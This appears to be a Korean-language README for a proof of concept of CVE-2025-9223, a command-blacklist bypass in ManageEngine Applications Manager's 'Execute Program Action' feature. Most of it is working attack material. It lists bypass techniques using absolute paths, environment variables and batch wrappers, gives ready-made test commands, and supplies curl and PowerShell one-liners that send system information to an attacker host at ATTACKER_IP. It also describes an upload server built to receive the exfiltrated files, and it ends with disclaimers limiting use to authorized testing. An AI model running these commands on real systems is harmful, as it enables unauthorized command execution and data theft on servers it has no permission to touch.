
PoC CVE-2025-9223
이 저장소에는 ManageEngine Applications Manager의 "Execute Program Action" 기능에서 명령 실행 취약점을 입증하는 개념 증명(PoC)이 포함되어 있습니다.
Applications Manager는 위험한 명령을 차단하기 위해 블랙리스트(BlackListCommands)를 사용하지만, 검증에는 치명적인 결함이 있습니다:
| 방법 | 예시 |
|---|---|
| 절대 경로 | C:\Windows\System32\netstat.exe |
| 환경 변수 | %SystemRoot%\System32\netstat.exe |
| 스크립트 래퍼 | echo netstat > a.bat && a.bat |
C:\Windows\System32\netstat.exe > out.txt && C:\Windows\System32\curl.exe -X POST -F "[email protected]" http://[KALI_IP]:8000/upload
upload_server.py 스크립트는 유출된 파일을 수신하기 위한 간단한 HTTP 서버를 제공합니다.
python3 upload_server.py
python3 upload_server.py --host 0.0.0.0 --port 8000 --dir ./uploads
--host: 바인딩 주소(기본값: 0.0.0.0)--port: HTTP 포트(기본값: 8000)--dir: 출력 디렉터리(기본값: 현재 디렉터리)| 메서드 | 엔드포인트 |
|---|
✅ 경로 탐색(path traversal) 방지
✅ 타임스탬프가 포함된 고유 파일 이름
✅ IP 및 User-Agent 요청 기록
✅ 콘텐츠 유형 검증
우회 예시가 포함된 test_commands.txt 파일을 생성하세요:
# 절대 경로를 사용한 우회
C:\Windows\System32\whoami.exe
C:\Windows\System32\netstat.exe -an
# 환경 변수를 사용한 우회
%SystemRoot%\System32\ipconfig.exe
%SystemRoot%\System32\systeminfo.exe
# 스크립트 래퍼를 사용한 우회
echo ipconfig > test.bat && test.bat
echo whoami > test.bat && call test.bat
# 데이터 유출 예시
C:\Windows\System32\ipconfig.exe > network.txt && C:\Windows\System32\curl.exe -X POST -F "[email protected]" http://ATTACKER_IP:8000/upload
C:\Windows\System32\systeminfo.exe > system.txt && C:\Windows\System32\powershell.exe -c "Invoke-WebRequest -Uri http://ATTACKER_IP:8000/upload -Method POST -InFile system.txt"
중요: 이 도구는 교육 목적과 승인된 테스트 목적으로만 제공됩니다.
❌ 금지: 소유하지 않거나 테스트할 명시적 권한이 없는 시스템에서 사용
❌ 금지: 불법 활동에 사용
✅ 허용: 보안 연구를 위해 통제된 환경에서만 사용
✅ 허용: 테스트 전에 적절한 승인을 받기
저자는 이 도구의 어떠한 오용에도 책임을 지지 않습니다. 사용자는 모든 책임과 위험을 감수합니다.
이 프로젝트는 연구 및 교육 목적으로만 제공됩니다. 모든 권리는 저작권자에게 있습니다.
Johan Aybar - 교육 목적
⚠️ 알림: 이 PoC는 승인된 테스트 환경에서만 사용해야 합니다. 승인되지 않은 사용은 불법일 수 있으며 엄격히 금지됩니다.
| 설명 |
|---|
| GET | / | 최근 업로드된 파일 목록 표시 |
| POST | /upload | 파일 업로드(multipart/form-data) |
| PUT | /upload/[filename] | 파일 직접 업로드 |